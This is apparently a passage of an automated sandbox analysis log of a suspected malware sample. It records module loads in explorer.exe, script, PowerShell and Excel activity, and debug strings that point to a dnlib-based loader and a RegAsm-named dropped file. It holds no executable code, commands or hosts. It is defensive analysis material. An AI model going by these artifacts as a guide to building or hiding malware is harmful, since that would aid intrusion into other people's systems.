            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
            Source: C:\Windows\explorer.exe | Section loaded: duser.dll
            Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
            Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: slc.dll
            Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
            Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: dagifhd, 00000011.00000000.500871936.0000000001082000.00000020.00000001.01000000.00000008.sdmp, dagifhd.15.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: dagifhd, 00000011.00000000.500871936.0000000001082000.00000020.00000001.01000000.00000008.sdmp, dagifhd.15.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
